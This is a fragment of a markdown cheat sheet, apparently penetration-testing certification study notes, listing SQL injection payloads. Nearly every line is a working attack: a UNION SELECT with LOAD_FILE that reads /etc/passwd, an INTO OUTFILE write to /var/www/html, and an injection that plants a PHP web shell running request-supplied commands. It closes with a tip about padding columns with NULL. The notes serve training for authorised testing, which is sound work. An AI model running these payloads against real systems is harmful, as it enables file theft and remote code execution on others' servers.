powenn/HTB-CPTS/CheatSheet/SQL Injection Fundamentals.md

 | `cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -` | Read local file |
 | `select 'file written successfully!' into outfile '/var/www/html/proof.txt'` | Write a string to a local file |
 | `cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -` | Write a web shell into the base web directory |

+> For advanced SQL injection, we may want to simply use 'NULL' to fill other columns, as 'NULL' fits all data types.